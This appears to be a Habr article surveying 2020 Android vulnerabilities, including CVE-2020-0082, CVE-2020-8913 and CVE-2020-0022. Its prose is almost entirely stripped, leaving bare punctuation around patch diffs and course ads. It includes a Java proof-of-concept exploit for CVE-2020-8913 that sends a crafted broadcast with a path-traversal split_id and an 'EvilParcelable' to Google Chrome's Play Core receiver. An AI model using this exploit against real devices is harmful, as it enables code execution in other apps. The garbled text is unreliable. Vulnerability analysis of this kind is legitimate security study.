Sicherheitslücken in Android 2020

Hallo Habr. Wir teilen Ihnen einen nützlichen Artikel von Alexander Kolesnikov mit.

---

Android . , , , . , , ? ? CWE TOP 25? Android ? Android 2020 .

Android

, . Android.

. 2 :

1. ;

   
   
   
   
   

2. Android , open source .

   
   
   
   
   

, , , 1 . . , . .

CVE-2020-0082

Android 10. CWE Top 25, CWE-502. , . , . , , -, . .

Android . system_server.

diff --git a/core/java/android/os/ExternalVibration.java b/core/java/android/os/ExternalVibration.java
index 37ca868..041d21f 100644
--- a/core/java/android/os/ExternalVibration.java
+++ b/core/java/android/os/ExternalVibration.java
@@ -157,7 +157,6 @@
         out.writeInt(mUid);
         out.writeString(mPkg);
         writeAudioAttributes(mAttrs, out, flags);
-        out.writeParcelable(mAttrs, flags);
         out.writeStrongBinder(mController.asBinder());
         out.writeStrongBinder(mToken);
     }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

Parsel "android.accounts.IAccountAuthenticatorResponse



".

CVE-2020-8913

Android Play ore . receiver . , Parcel. Google Chrome:

//   ,     
public static final String APP = "com.android.chrome";

protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
//  
    Intent launchIntent = getPackageManager().getLaunchIntentForPackage(APP);
    startActivity(launchIntent);
//   Intent     
    new Handler().postDelayed(() -> {
        Intent split = new Intent();
        split.setData(Uri.parse("file://" + getApplicationInfo().sourceDir));
        split.putExtra("split_id", "../verified-splits/config.test");
//  ]
        Bundle bundle = new Bundle();
        bundle.putInt("status", 3);
        bundle.putParcelableArrayList("split_file_intents", new ArrayList<Parcelable>(Arrays.asList(split)));
//  Intent      receiver
        Intent intent = new Intent("com.google.android.play.core.splitinstall.receiver.SplitInstallUpdateIntentService");
        intent.setPackage(APP);
        intent.putExtra("session_state", bundle);
        sendBroadcast(intent);
    }, 3000);
// ,     
    new Handler().postDelayed(() -> {
        startActivity(launchIntent.putExtra("x", new EvilParcelable()));
    }, 5000);
}
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

CVE-2020-8899

. 100% , Android, C . Samsung.

, Android .

, , . . CWE-787.

CVE-2020-0022

BlueTooth Android 8 9. . CWE-787.

diff --git a/hci/src/packet_fragmenter.cc b/hci/src/packet_fragmenter.cc
index 5036ed5..143fc23 100644
--- a/hci/src/packet_fragmenter.cc
+++ b/hci/src/packet_fragmenter.cc
@@ -221,7 +221,8 @@
                  "%s got packet which would exceed expected length of %d. "
                  "Truncating.",
                  __func__, partial_packet->len);
-        packet->len = partial_packet->len - partial_packet->offset;
+        packet->len =
+            (partial_packet->len - partial_packet->offset) + packet->offset;
         projected_offset = partial_packet->len;
       }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

. 300 33 .

, , . , .

---

Android- . .



- Android Developer. Basic

- Android Developer. Professional